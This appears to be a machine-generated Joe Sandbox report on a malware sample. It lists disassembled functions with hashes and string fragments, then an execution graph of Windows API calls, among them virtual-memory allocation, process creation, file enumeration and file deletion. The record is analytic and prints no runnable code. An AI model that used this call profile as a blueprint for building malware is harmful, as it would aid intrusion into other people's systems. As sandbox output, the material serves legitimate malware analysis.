                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $!F$$W$%'$,$-9$0$0$1$4$5u$;$;N$=w$B0$DH$P`$Q$V$Z~$_p$b$cm$m$o$rR$ $:
                                                      • API String ID: 0-4078448229
                                                      • Opcode ID: 00a754af35dd998cea1c3922bdffd638c00ee8ed59938c7d2cf47004202682f2
                                                      • Instruction ID: 5914d0c48bcc82a5aa2e5318a918be5910b79d9105a747a17b73f926bbe274e6
                                                      • Opcode Fuzzy Hash: 00a754af35dd998cea1c3922bdffd638c00ee8ed59938c7d2cf47004202682f2
                                                      • Instruction Fuzzy Hash: 539146B0C05668CBEB65CF91C9987DEBBB5BB05308F1081D9C15D6B281D7BA1AC9CF90
                                                      Function 059AEC77 Relevance: 34.0, Strings: 27, Instructions: 264COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                      • API String ID: 0-1002149817
                                                      • Opcode ID: 83c49bdb0b3dfa0bf59575a4d43c332d11ca75efe5c8e390b57b93a69c23fdea
                                                      • Instruction ID: c20a7b1319f4b15b08a19313375e78b5a218017d6a8f6fa555416ffa66c9d29f
                                                      • Opcode Fuzzy Hash: 83c49bdb0b3dfa0bf59575a4d43c332d11ca75efe5c8e390b57b93a69c23fdea
                                                      • Instruction Fuzzy Hash: 9DC12FB1D013689EEB61DFA4CD44BEEBBB9AF44304F0081D9D50CA7241E7B55A88CFA5
                                                      Function 059A7227 Relevance: 16.4, Strings: 13, Instructions: 194COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                      • API String ID: 0-392141074
                                                      • Opcode ID: 2148b781e59ed181631bad533c75f46b01b87f95543f700a8f865f9458fe64dc
                                                      • Instruction ID: 091866390a098270d0bb9a05045836c673d5440fcc27b373e3ae01612bce8071
                                                      • Opcode Fuzzy Hash: 2148b781e59ed181631bad533c75f46b01b87f95543f700a8f865f9458fe64dc
                                                      • Instruction Fuzzy Hash: 687110B1D14318AAEB25DBA4CC84FEEB77DFF88700F04429DE508A6140E7B567498FA5
                                                      Function 059A721E Relevance: 16.4, Strings: 13, Instructions: 179COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                      • API String ID: 0-392141074
                                                      • Opcode ID: 4fd1997fd6a7a99057346578c848b3d4ee64a39b6c04bc23b0eae99493144e9c
                                                      • Instruction ID: 9c8b60634419794f870ae5287f12dc51d6d4fd6ab7bc9fd158eec4168a2d56df
                                                      • Opcode Fuzzy Hash: 4fd1997fd6a7a99057346578c848b3d4ee64a39b6c04bc23b0eae99493144e9c
                                                      • Instruction Fuzzy Hash: F86110B1D14318EAEB25DBA4CC84FEE777DBF88700F04429DE508A6140E7B567498FA5
                                                      Function 0599AE5E Relevance: 15.1, Strings: 12, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "Q$D$\$e$e$i$l$n$r$r$w$x
                                                      • API String ID: 0-3574803664
                                                      • Opcode ID: 985575ef6b502c99be7b3f40055280e663df110fc18fc9ac4207ca6d4287f135
                                                      • Instruction ID: 4a973d7ed4d9f06d6b43c7512fe386721c9276552e5f3f41d18675ed274f7b99
                                                      • Opcode Fuzzy Hash: 985575ef6b502c99be7b3f40055280e663df110fc18fc9ac4207ca6d4287f135
                                                      • Instruction Fuzzy Hash: 8C3193B1D01318AEEF54DFE4CC88BEE7BB9EF44304F14425DE508B6280DBB516498BA5
                                                      Function 059A2327 Relevance: 10.1, Strings: 8, Instructions: 131COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .$P$e$i$m$o$r$x
                                                      • API String ID: 0-620024284
                                                      • Opcode ID: e5424e1634d67ed81b3724d1aa50a976ec3fc9f28bef8e137c1f5ab4b81f72d1
                                                      • Instruction ID: b28b5f786ce6363ebad1b3e35ca29c201f74c0ef0d03812decf72e7cdb50e559
                                                      • Opcode Fuzzy Hash: e5424e1634d67ed81b3724d1aa50a976ec3fc9f28bef8e137c1f5ab4b81f72d1
                                                      • Instruction Fuzzy Hash: E24164B5900318A6FF25EBA4CD44FDE737CAF94300F00869DA509A7141EAF567888FE1
                                                      Function 05993C37 Relevance: 10.0, Strings: 8, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !$9$>$[$o$q$u$v
                                                      • API String ID: 0-150631307
                                                      • Opcode ID: b4351f2f7e328675d1c07015e39ff52f3a75a6ebb40f7cf32b65b9bc6514c9b3
                                                      • Instruction ID: d5db7660536c9ac0d495c812c735aaa165c31eca25e25c86b7deb0bb2f7cf8b7
                                                      • Opcode Fuzzy Hash: b4351f2f7e328675d1c07015e39ff52f3a75a6ebb40f7cf32b65b9bc6514c9b3
                                                      • Instruction Fuzzy Hash: 4C11DE10D087CAD9DF12CBBC84086AEBF715F23224F0886D8D8E56B3D2D2794646C7A6
                                                      Function 059AF4D7 Relevance: 8.9, Strings: 7, Instructions: 119COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: L$S$\$a$c$e$l
                                                      • API String ID: 0-3322591375
                                                      • Opcode ID: d28677744a139105702420ca88f60d4c0fd5e6206e7fec8eff78a9352e83bfce
                                                      • Instruction ID: faf60e817ecbc22c1965f93430b184ac53aeda6490aa4b370b2ec3ccbef38db7
                                                      • Opcode Fuzzy Hash: d28677744a139105702420ca88f60d4c0fd5e6206e7fec8eff78a9352e83bfce
                                                      • Instruction Fuzzy Hash: 8A4153B6D04218AAEF50DFA4DC88AEEB7F8FF88310F45425AD91DA7100E77156458FE0
                                                      Function 059A6FE3 Relevance: 7.7, Strings: 6, Instructions: 171COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: F$P$T$f$r$x
                                                      • API String ID: 0-2523166886
                                                      • Opcode ID: f5c3b78032b7d475c7fe6ed21d173f4aac9b6eb5976e3f79acf28d24cc90005c
                                                      • Instruction ID: c49669f627cfcee64aab5dc7610b7f85baf2ba487aa64815f8b48fe7bb26a62a
                                                      • Opcode Fuzzy Hash: f5c3b78032b7d475c7fe6ed21d173f4aac9b6eb5976e3f79acf28d24cc90005c
                                                      • Instruction Fuzzy Hash: 1451A372A00304AAEB34DFA5CD89BEAB7BCFF45704F044A6DE44966580E7B46544CBF2
                                                      Function 059A6CD0 Relevance: 6.5, Strings: 5, Instructions: 234COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $e$h$o$tEw
                                                      • API String ID: 0-1286782980
                                                      • Opcode ID: ef740b9a954609ac904c412c86dc8e7f6c65ae03976a1d894aa74adde4cf00bd
                                                      • Instruction ID: da195bc378c162539ce8df0b4cc3d0e50eb8ace14d5559afbfbe0e9862326a35
                                                      • Opcode Fuzzy Hash: ef740b9a954609ac904c412c86dc8e7f6c65ae03976a1d894aa74adde4cf00bd
                                                      • Instruction Fuzzy Hash: 06812FB2D01218AAFB15EB94CD88FEE737DFF88700F04459DE509A6140EB756B858BE1
                                                      Function 059A6713 Relevance: 6.4, Strings: 5, Instructions: 200COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $i$l$o$u
                                                      • API String ID: 0-2051669658
                                                      • Opcode ID: 1f7a47482f8f94590bb3051f8a60d11aaecfde86e31343e88beccd8e0fce0b73
                                                      • Instruction ID: f5b05698ddf425b78d3c66123d7cb96df2ca3242f7394425e0ff58bc46242a6d
                                                      • Opcode Fuzzy Hash: 1f7a47482f8f94590bb3051f8a60d11aaecfde86e31343e88beccd8e0fce0b73
                                                      • Instruction Fuzzy Hash: 5A616EB6E00204AFDB24DBA4CC84FEFB7FDEB88714F144558E559A7240E635AA45CBA0
                                                      Function 059A6717 Relevance: 6.4, Strings: 5, Instructions: 126COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $i$l$o$u
                                                      • API String ID: 0-2051669658
                                                      • Opcode ID: 018ae1c9aaf1511aa2a75474a8e8f6af209e71c6478f95ad77315efe00d89a76
                                                      • Instruction ID: 372fba26868efc6716d53b64638c621e05b23bb7706458d458e0c2d62c9f7c57
                                                      • Opcode Fuzzy Hash: 018ae1c9aaf1511aa2a75474a8e8f6af209e71c6478f95ad77315efe00d89a76
                                                      • Instruction Fuzzy Hash: 024101B2D00304AFDB20DFA4C884FEEBBFDAB88704F104559E559A7240D775AA44CBA0
                                                      Function 059A6CC7 Relevance: 6.4, Strings: 5, Instructions: 102COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $e$h$o$tEw
                                                      • API String ID: 0-1286782980
                                                      • Opcode ID: 5d55f588c861b0ef3b41afadb11b9400c18f4622001cae6c5d6cb913a125f5d9
                                                      • Instruction ID: 4d2855691a37cd7d5d28cb434d9c82659f65372b3248da5554bc2cac6fb0838b
                                                      • Opcode Fuzzy Hash: 5d55f588c861b0ef3b41afadb11b9400c18f4622001cae6c5d6cb913a125f5d9
                                                      • Instruction Fuzzy Hash: 32415071D01318AAEB14EBA4CD88FEE7379FF88700F04419DA50DA6150EBB46B848FE5
                                                      Function 0599506B Relevance: 6.3, Strings: 5, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $qC$M$}u$d$g
                                                      • API String ID: 0-1570183175
                                                      • Opcode ID: 0e1d8ef03eb6a860b280abea23434063e9afc4993b95a7fd97b3d0aa26dfd1a3
                                                      • Instruction ID: 38a7bbf4e5a7419e01ee8a39f0beed97ec6793b72ff708df771ae9c57db28e6d
                                                      • Opcode Fuzzy Hash: 0e1d8ef03eb6a860b280abea23434063e9afc4993b95a7fd97b3d0aa26dfd1a3
                                                      • Instruction Fuzzy Hash: C9115AB4D0625CAADF00DFC4AA855DDBB79EF46280F149089E510BB350D3750A05CBD6
                                                      Function 059A63A6 Relevance: 5.3, Strings: 4, Instructions: 302COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $e$k$o
                                                      • API String ID: 0-3624523832
                                                      • Opcode ID: 92e2e38bdecacd9e9dfc5babffd75e8b0914226b6e72fc872b2df58742580849
                                                      • Instruction ID: f6496462aaca06d2af73590bf68e78c7b157f4e3fb4cebef91a8366c2e0fdf5a
                                                      • Opcode Fuzzy Hash: 92e2e38bdecacd9e9dfc5babffd75e8b0914226b6e72fc872b2df58742580849
                                                      • Instruction Fuzzy Hash: 67B121B6A00304AFDB14DBA4CC85FEFB7FDAF88704F148558F61997244DA75AA41CBA0
                                                      Function 059A63A7 Relevance: 5.2, Strings: 4, Instructions: 181COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $e$k$o
                                                      • API String ID: 0-3624523832
                                                      • Opcode ID: d3a89d8224864edf89595694a78bc688ecec70b2e5ad62f9d54de05d73ec686c
                                                      • Instruction ID: 5c0c74196523ac8d8eae722d89d0c231381a06498d215222bc2871f8f0185f31
                                                      • Opcode Fuzzy Hash: d3a89d8224864edf89595694a78bc688ecec70b2e5ad62f9d54de05d73ec686c
                                                      • Instruction Fuzzy Hash: A36132B6A00344AFDB54DFA4CC84FEFB7BDAF88704F148558E61997244DB71AA41CBA0
                                                      Function 059A6267 Relevance: 5.1, Strings: 4, Instructions: 122COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                      • API String ID: 0-2877786613
                                                      • Opcode ID: 4b1b3be30f2521f66a96d901e6f261103f9524e0028fbb17d3f8b2e6b26aa2b4
                                                      • Instruction ID: c24829a510ab8dc795ccfef14d7503106a45efda3bf6d1eaf56da10b448af25d
                                                      • Opcode Fuzzy Hash: 4b1b3be30f2521f66a96d901e6f261103f9524e0028fbb17d3f8b2e6b26aa2b4
                                                      • Instruction Fuzzy Hash: 6341FAB1A112587AFB11EB908D46FEF777CEFD5B00F044148BA04AA284D6B4BB4587A6
                                                      Function 059A2507 Relevance: 5.1, Strings: 4, Instructions: 89COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5670000_crUcuBAsmdG.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 1$3$4$6
                                                      • API String ID: 0-3685021172
                                                      • Opcode ID: b2fb09e57e9186eb9b078b52234a678e40f2812c1f51ce2e7918de4935321bd7
                                                      • Instruction ID: 305b1a4e86b132c88634bec15f1efe9ee23eba507a1a33716eaf3463b63c286a
                                                      • Opcode Fuzzy Hash: b2fb09e57e9186eb9b078b52234a678e40f2812c1f51ce2e7918de4935321bd7
                                                      • Instruction Fuzzy Hash: 99314FB1A00209ABFF04DBA4CD45FEE77B8EF44304F044199E904A7240E6B6AA058BE5

                                                      Execution Graph

                                                      Execution Coverage:2.4%
                                                      Dynamic/Decrypted Code Coverage:4.4%
                                                      Signature Coverage:2.3%
                                                      Total number of Nodes:436
                                                      Total number of Limit Nodes:69
                                                      execution_graph 101133 2c55604 101134 2c555a5 101133->101134 101135 2c55607 101133->101135 101140 2c57af0 101134->101140 101138 2c555dc 101139 2c555b0 101139->101138 101144 2c57a70 101139->101144 101141 2c57b03 101140->101141 101151 2c68330 101141->101151 101143 2c57b2e 101143->101139 101145 2c57ab4 101144->101145 101150 2c57ad5 101145->101150 101157 2c68100 101145->101157 101147 2c57ac5 101148 2c57ae1 101147->101148 101162 2c68df0 101147->101162 101148->101139 101150->101139 101152 2c683ab 101151->101152 101154 2c68358 101151->101154 101156 4b62dd0 LdrInitializeThunk 101152->101156 101153 2c683d0 101153->101143 101154->101143 101156->101153 101158 2c6817a 101157->101158 101159 2c68128 101157->101159 101165 4b64650 LdrInitializeThunk 101158->101165 101159->101147 101160 2c6819f 101160->101147 101163 2c68e0d 101162->101163 101164 2c68e1e NtClose 101163->101164 101164->101150 101165->101160 101166 2c49a00 101168 2c49c0a 101166->101168 101169 2c49f9f 101168->101169 101170 2c6ab00 101168->101170 101171 2c6ab23 101170->101171 101176 2c43fd0 101171->101176 101173 2c6ab2f 101175 2c6ab68 101173->101175 101179 2c65070 101173->101179 101175->101169 101178 2c43fdd 101176->101178 101183 2c52bf0 101176->101183 101178->101173 101180 2c650d2 101179->101180 101182 2c650df 101180->101182 101207 2c513b0 101180->101207 101182->101175 101184 2c52c0a 101183->101184 101186 2c52c23 101184->101186 101187 2c69830 101184->101187 101186->101178 101188 2c6984a 101187->101188 101189 2c69879 101188->101189 101194 2c68430 101188->101194 101189->101186 101195 2c6844d 101194->101195 101201 4b62c0a 101195->101201 101196 2c68479 101198 2c6ae90 101196->101198 101204 2c69150 101198->101204 101200 2c698f2 101200->101186 101202 4b62c11 101201->101202 101203 4b62c1f LdrInitializeThunk 101201->101203 101202->101196 101203->101196 101205 2c6916d 101204->101205 101206 2c6917e RtlFreeHeap 101205->101206 101206->101200 101208 2c513eb 101207->101208 101223 2c57880 101208->101223 101210 2c513f3 101221 2c516cd 101210->101221 101234 2c6af70 101210->101234 101212 2c51409 101213 2c6af70 RtlAllocateHeap 101212->101213 101214 2c5141a 101213->101214 101215 2c6af70 RtlAllocateHeap 101214->101215 101216 2c5142b 101215->101216 101222 2c514cb 101216->101222 101245 2c563e0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 101216->101245 101219 2c51682 101241 2c679b0 101219->101241 101221->101182 101237 2c53f30 101222->101237 101224 2c578ac 101223->101224 101246 2c57770 101224->101246 101227 2c578f1 101230 2c5790d 101227->101230 101232 2c68df0 NtClose 101227->101232 101228 2c578d9 101229 2c578e4 101228->101229 101231 2c68df0 NtClose 101228->101231 101229->101210 101230->101210 101231->101229 101233 2c57903 101232->101233 101233->101210 101257 2c69100 101234->101257 101236 2c6af8b 101236->101212 101238 2c53f54 101237->101238 101239 2c53f5b 101238->101239 101240 2c53f90 LdrLoadDll 101238->101240 101239->101219 101240->101239 101242 2c67a12 101241->101242 101244 2c67a1f 101242->101244 101260 2c516e0 101242->101260 101244->101221 101245->101222 101247 2c57866 101246->101247 101248 2c5778a 101246->101248 101247->101227 101247->101228 101252 2c684d0 101248->101252 101251 2c68df0 NtClose 101251->101247 101253 2c684ea 101252->101253 101256 4b635c0 LdrInitializeThunk 101253->101256 101254 2c5785a 101254->101251 101256->101254 101258 2c6911d 101257->101258 101259 2c6912e RtlAllocateHeap 101258->101259 101259->101236 101262 2c51700 101260->101262 101276 2c57b50 101260->101276 101270 2c51c66 101262->101270 101280 2c60b40 101262->101280 101265 2c51914 101289 2c6c180 101265->101289 101266 2c5175e 101266->101270 101284 2c6c050 101266->101284 101268 2c51929 101272 2c5197c 101268->101272 101295 2c50200 101268->101295 101269 2c57af0 LdrInitializeThunk 101269->101272 101270->101244 101272->101269 101272->101270 101273 2c50200 LdrInitializeThunk 101272->101273 101273->101272 101274 2c57af0 LdrInitializeThunk 101275 2c51ad3 101274->101275 101275->101272 101275->101274 101277 2c57b5d 101276->101277 101278 2c57b85 101277->101278 101279 2c57b7e SetErrorMode 101277->101279 101278->101262 101279->101278 101281 2c60b43 101280->101281 101298 2c6ae00 101281->101298 101283 2c60b61 101283->101266 101285 2c6c066 101284->101285 101286 2c6c060 101284->101286 101287 2c6af70 RtlAllocateHeap 101285->101287 101286->101265 101288 2c6c08c 101287->101288 101288->101265 101290 2c6c0f0 101289->101290 101291 2c6c14d 101290->101291 101292 2c6af70 RtlAllocateHeap 101290->101292 101291->101268 101293 2c6c12a 101292->101293 101294 2c6ae90 RtlFreeHeap 101293->101294 101294->101291 101305 2c69070 101295->101305 101301 2c68f50 101298->101301 101300 2c6ae31 101300->101283 101302 2c68fe5 101301->101302 101304 2c68f7b 101301->101304 101303 2c68ffb NtAllocateVirtualMemory 101302->101303 101303->101300 101304->101300 101306 2c6908a 101305->101306 101309 4b62c70 LdrInitializeThunk 101306->101309 101307 2c50222 101307->101275 101309->101307 101310 2c51c80 101311 2c68430 LdrInitializeThunk 101310->101311 101312 2c51cb6 101311->101312 101315 2c68e80 101312->101315 101314 2c51ccb 101316 2c68f0f 101315->101316 101318 2c68eab 101315->101318 101320 4b62e80 LdrInitializeThunk 101316->101320 101317 2c68f40 101317->101314 101318->101314 101320->101317 101331 2c61180 101332 2c6119c 101331->101332 101333 2c611c4 101332->101333 101334 2c611d8 101332->101334 101335 2c68df0 NtClose 101333->101335 101336 2c68df0 NtClose 101334->101336 101337 2c611cd 101335->101337 101338 2c611e1 101336->101338 101341 2c6afb0 RtlAllocateHeap 101338->101341 101340 2c611ec 101341->101340 101348 2c5960a 101349 2c59619 101348->101349 101350 2c6ae90 RtlFreeHeap 101349->101350 101351 2c59620 101349->101351 101350->101351 101352 2c58217 101353 2c5821a 101352->101353 101354 2c581d1 101353->101354 101356 2c56970 LdrInitializeThunk LdrInitializeThunk 101353->101356 101356->101354 101357 2c56750 101358 2c5677a 101357->101358 101361 2c57920 101358->101361 101360 2c567a4 101362 2c5793d 101361->101362 101368 2c68520 101362->101368 101364 2c57994 101364->101360 101365 2c5798d 101365->101364 101373 2c68600 101365->101373 101367 2c579bd 101367->101360 101369 2c685bb 101368->101369 101371 2c6854b 101368->101371 101378 4b62f30 LdrInitializeThunk 101369->101378 101370 2c685f4 101370->101365 101371->101365 101374 2c686ae 101373->101374 101376 2c6862c 101373->101376 101379 4b62d10 LdrInitializeThunk 101374->101379 101375 2c686f3 101375->101367 101376->101367 101378->101370 101379->101375 101380 2c56d10 101381 2c56d28 101380->101381 101383 2c56d82 101380->101383 101381->101383 101384 2c5ac50 101381->101384 101385 2c5ac76 101384->101385 101386 2c5aeaf 101385->101386 101411 2c691e0 101385->101411 101386->101383 101388 2c5acf2 101388->101386 101389 2c6c180 2 API calls 101388->101389 101390 2c5ad11 101389->101390 101390->101386 101391 2c5ade8 101390->101391 101392 2c68430 LdrInitializeThunk 101390->101392 101394 2c55500 LdrInitializeThunk 101391->101394 101395 2c5ae07 101391->101395 101393 2c5ad73 101392->101393 101393->101391 101396 2c5ad7c 101393->101396 101394->101395 101410 2c5ae97 101395->101410 101417 2c67fa0 101395->101417 101396->101386 101404 2c5adae 101396->101404 101405 2c5add0 101396->101405 101414 2c55500 101396->101414 101397 2c57af0 LdrInitializeThunk 101402 2c5adde 101397->101402 101398 2c57af0 LdrInitializeThunk 101403 2c5aea5 101398->101403 101402->101383 101403->101383 101432 2c641f0 LdrInitializeThunk 101404->101432 101405->101397 101406 2c5ae6e 101422 2c68050 101406->101422 101408 2c5ae88 101427 2c681b0 101408->101427 101410->101398 101412 2c691fa 101411->101412 101413 2c6920b CreateProcessInternalW 101412->101413 101413->101388 101415 2c68600 LdrInitializeThunk 101414->101415 101416 2c5553e 101415->101416 101416->101404 101418 2c6801a 101417->101418 101420 2c67fc8 101417->101420 101433 4b639b0 LdrInitializeThunk 101418->101433 101419 2c6803f 101419->101406 101420->101406 101423 2c680cd 101422->101423 101425 2c6807b 101422->101425 101434 4b64340 LdrInitializeThunk 101423->101434 101424 2c680f2 101424->101408 101425->101408 101428 2c6822a 101427->101428 101430 2c681d8 101427->101430 101435 4b62fb0 LdrInitializeThunk 101428->101435 101429 2c6824f 101429->101410 101430->101410 101432->101405 101433->101419 101434->101424 101435->101429 101436 2c65250 101437 2c652b2 101436->101437 101438 2c652bf 101437->101438 101440 2c56d90 101437->101440 101441 2c56d64 101440->101441 101442 2c5ac50 9 API calls 101441->101442 101443 2c56d82 101441->101443 101442->101443 101443->101438 101445 2c68d50 101446 2c68dc7 101445->101446 101448 2c68d7b 101445->101448 101447 2c68ddd NtDeleteFile 101446->101447 101450 2c52158 101453 2c55c80 101450->101453 101452 2c52183 101455 2c55cb3 101453->101455 101454 2c55cd7 101454->101452 101455->101454 101460 2c68950 101455->101460 101457 2c55cfa 101457->101454 101458 2c68df0 NtClose 101457->101458 101459 2c55d7a 101458->101459 101459->101452 101461 2c6896d 101460->101461 101464 4b62ca0 LdrInitializeThunk 101461->101464 101462 2c68999 101462->101457 101464->101462 101465 2c507db PostThreadMessageW 101466 2c507ed 101465->101466 101467 2c499a0 101469 2c499af 101467->101469 101468 2c499f0 101469->101468 101470 2c499dd CreateThread 101469->101470 101471 2c5bfe0 101472 2c5c009 101471->101472 101473 2c5c10d 101472->101473 101474 2c5c0b3 FindFirstFileW 101472->101474 101474->101473 101475 2c5c0ce 101474->101475 101476 2c5c0f4 FindNextFileW 101475->101476 101476->101475 101477 2c5c106 FindClose 101476->101477 101477->101473 101478 2c68260 101479 2c68288 101478->101479 101480 2c682ec 101478->101480 101483 4b62ee0 LdrInitializeThunk 101480->101483 101481 2c6831d 101483->101481 101484 2c65ae0 101485 2c65b3a 101484->101485 101487 2c65b47 101485->101487 101488 2c634f0 101485->101488 101489 2c6ae00 NtAllocateVirtualMemory 101488->101489 101491 2c63531 101489->101491 101490 2c6362e 101490->101487 101491->101490 101492 2c53f30 LdrLoadDll 101491->101492 101494 2c6356d 101492->101494 101493 2c635b0 Sleep 101493->101494 101494->101490 101494->101493 101495 2c52ae3 101496 2c57770 2 API calls 101495->101496 101497 2c52af3 101496->101497 101498 2c52b0f 101497->101498 101499 2c68df0 NtClose 101497->101499 101499->101498 101500 4b62ad0 LdrInitializeThunk 101501 2c68c60 101502 2c68d07 101501->101502 101504 2c68c8b 101501->101504 101503 2c68d1d NtReadFile 101502->101503 101505 2c61520 101507 2c61539 101505->101507 101506 2c61584 101508 2c6ae90 RtlFreeHeap 101506->101508 101507->101506 101510 2c615c7 101507->101510 101512 2c615cc 101507->101512 101509 2c61594 101508->101509 101511 2c6ae90 RtlFreeHeap 101510->101511 101511->101512 101513 2c683e0 101514 2c683fa 101513->101514 101517 4b62df0 LdrInitializeThunk 101514->101517 101515 2c68422 101517->101515 101518 2c4aef0 101519 2c6ae00 NtAllocateVirtualMemory 101518->101519 101520 2c4c561 101518->101520 101519->101520 101521 2c5f230 101522 2c5f294 101521->101522 101523 2c55c80 2 API calls 101522->101523 101525 2c5f3c7 101523->101525 101524 2c5f3ce 101525->101524 101550 2c55d90 101525->101550 101527 